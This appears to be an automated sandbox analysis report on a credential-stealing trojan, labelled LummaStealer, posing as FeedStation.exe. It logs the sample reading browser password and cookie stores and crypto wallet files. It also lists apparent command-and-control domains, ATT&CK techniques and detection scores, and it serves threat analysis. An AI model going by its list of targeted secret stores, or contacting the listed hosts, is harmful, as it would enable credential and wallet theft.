              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: Yara matchFile source: Process Memory Space: FeedStation.exe PID: 6416, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: FeedStation.exe PID: 6416, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              121
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              LSASS Memory11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              FeedStation.exe55%ReversingLabsWin32.Trojan.LummaStealer
              FeedStation.exe64%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://sputnik-1985.com/api#100%Avira URL Cloudmalware
              https://sputnik-1985.com/.100%Avira URL Cloudmalware
              http://www.newsgator.com/U0%Avira URL Cloudsafe
              https://sputnik-1985.com/.mgmd100%Avira URL Cloudmalware
              https://sputnik-1985.com:443/api100%Avira URL Cloudmalware
              http://www.bradsoft.com/feeddemon/help/3.0/enclosures/0%Avira URL Cloudsafe
              https://sputnik-1985.com/api6C100%Avira URL Cloudmalware
              http://www.newsgator.com/0%Avira URL Cloudsafe
              https://sputnik-1985.com/api2100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              104.102.49.254
              truefalse
                high
                sputnik-1985.com
                104.21.112.1
                truefalse
                  high
                  sordid-snaked.cyou
                  unknown
                  unknownfalse
                    high
                    diffuculttan.xyz
                    unknown
                    unknownfalse
                      high
                      effecterectz.xyz
                      unknown
                      unknownfalse
                        high
                        awake-weaves.cyou
                        unknown
                        unknownfalse
                          high
                          immureprech.biz
                          unknown
                          unknownfalse
                            high
                            wrathful-jammy.cyou
                            unknown
                            unknownfalse
                              high
                              ingreem-eilish.biz
                              unknown
                              unknownfalse
                                high
                                deafeninggeh.biz
                                unknown
                                unknownfalse
                                  high
                                  debonairnukk.xyz
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    sordid-snaked.cyoufalse
                                      high
                                      deafeninggeh.bizfalse
                                        high
                                        effecterectz.xyzfalse
                                          high
                                          wrathful-jammy.cyoufalse
                                            high
                                            https://sputnik-1985.com/apifalse
                                              high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                high
                                                awake-weaves.cyoufalse
                                                  high
                                                  immureprech.bizfalse
                                                    high
                                                    debonairnukk.xyzfalse
                                                      high
                                                      diffuculttan.xyzfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/chrome_newtabFeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://player.vimeo.comFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/ac/?q=FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcastsFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://sputnik-1985.com/api6CFeedStation.exe, 00000000.00000003.2412499112.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2400514499.00000000037E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://store.steampowered.com/subscriber_agreement/FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.gstatic.cn/recaptcha/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.valvesoftware.com/legal.htmFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.youtube.comFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.comFeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englFeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCFeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
